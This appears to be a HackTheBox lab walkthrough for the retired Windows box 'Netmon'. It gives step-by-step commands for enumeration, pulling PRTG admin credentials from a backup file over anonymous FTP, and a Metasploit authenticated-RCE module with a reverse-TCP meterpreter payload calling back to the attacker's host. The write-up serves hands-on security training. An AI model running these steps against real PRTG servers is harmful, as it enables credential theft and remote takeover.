Netmon HackTheBox WalkThrough
This is Netmon HackTheBox machine walkthrough and is also the
24th machine of our
OSCP like HTB Boxes series. In this writeup I have demonstrated step-by-step how I rooted to
Netmon HackTheBox machine. But, before diving into the hacking part let us know something about this box. It is a
Windows OS machine with IP address
10.10.10.152 and difficulty
easy assigned by its maker.
Since this machine is
retired so you will require VIP subscription at hackthebox.eu to access this machine. So first of all connect your Kali/Parrot machine with
HackTheBox VPN and confirm your connectivity with this machine by pinging its IP 10.10.10.152. If all goes correct then start hacking.
As usual I started by scanning the machine with Nmap. Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used
Nmap for this task and the result is given below:-
$ sudo nmap -sC -sV -sT -T3 -oA nmap/Netmon 10.10.10.152
Nmap found many number of ports as open. Among these ports port number 21 and 80 are most important because
anonymous login is allowed on port
ftpd server is running.
Httpd server is running over port 80 and port 80 has more attack surface as compared to other ports. Nmap script
http-server-header revealed that it is using
PRTG 18.1.37 web server for hosting website over it. You can also confirm the server version by checking http response header of the server. It gives almost 100 % correct answer.
Banner Grabbing Server Version
$ curl --head -L http://10.10.10.152/index.htm
Response header revealed the web server version which is
PRTG 18.1.37. Soon I get any software and its version my next step is to search for available exploit for particular version. This time too I did the same thing.
Searching for Available Exploits
$ searchsploit PRTG
$ Searchsploit (Kali tool to query exploit-db database offline) revealed that PRTG Network Monitor
18.2.38 is affected with
authenticated RCE. So to use this exploit we need a valid credential. After going to http://10.10.10.152 redirected to login page. Then tried to login with its default credential
prtgadmin and some other well-known credentials like
password but nothing worked.
We also have
anonymous login allowed on ftp server. Let us explore whether we can get anything interesting from the ftp shared folder. After some initial enumeration I could download
user.txt file from
C:\Users\Public\ further I could not found any way by which I could get shell. I tried to
webshell in PRTG web directory but file upload is not allowed.
Then I thought if web application requires some credential so that credential must be present in some configuration file from which it authenticate the user. After some googling I found the location where PRTG Monitor stores its users credential. Check this link for more info. It revealed that it stores data at directory
\ProgramData\\Paessler\\"PRTG Network Monitor"\. After accessing the folder
PRTG network Monitor found many configuration files. Didn’t know which would be helpful that’s why I downloaded all of them to my Kali machine for further analysis.
Logging to FTP account
$ ftp 10.10.10.152
ftp> cd \\ProgramData\\Paessler\\"PRTG Network Monitor"\\
ftp> get "PRTG Configuration.old.bak"
After analyzing all the other configuration files I could not found anything special in them but I found a username and a password in
PRTG Configuration.old.bak file.
Extracting Password from Backup File
$ grep -A3 -B3 -i prtgadmin 'PRTG Configuration.old.bak'
The extracted credential is
[email protected]. When I tried to login at URL http://10.10.10.152/public/login.htm?loginurl=%2Fwelcome.htm&errormsg= using this credential it gave me login failed. But when I tried to login using the creds
[email protected] I logged in successfully. I updated the password from
[email protected] to
[email protected] just to test whether this password is being updated by every year and it do. Anyway, let us move to run our exploit to get Remote Code Execution on Netmon machine.
After some googling I found that a metasploit module for PRTG Monitor Authenticated RCE is also present. Check this link for more info and the module is
So let us exploit this machine to get user shell on our machine.
Getting User Shell
msf6 > search prtg
msf6 > use exploit/windows/http/prtg_authenticated_rce
msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOSTS 10.10.10.152
msf6 exploit(windows/http/prtg_authenticated_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_USERNAME prtgadmin
msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD [email protected]
msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST 10.10.14.7
msf6 exploit(windows/http/prtg_authenticated_rce) > set VHOST 10.10.14.7
msf6 exploit(windows/http/prtg_authenticated_rce) > exploit
meterpreter > sysinfo
meterpreter > getuid
We got a meterpreter shell and that too with the
NT AUTHORITY\SYSTEM privilege. This shell is elevated because PRTG Software is running as Admin User Privilege. Let us capture user and root flag from their respective directories.
Capture User & Root Flag
meterpreter > search -f user.txt C:\\Users\\Public\\Desktop\\
meterpreter > cat "c:\Users\Public\Desktop\user.txt"
meterpreter > search -f root.txt C:\\Administrator\\
meterpreter > cat "c:\Users\Administrator\Desktop\root.txt"
This was how I rooted Netmon HackTheBox machine. Learnt a lot after this challenge, hope you have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion related to walkthrough feel free to write us at [email protected].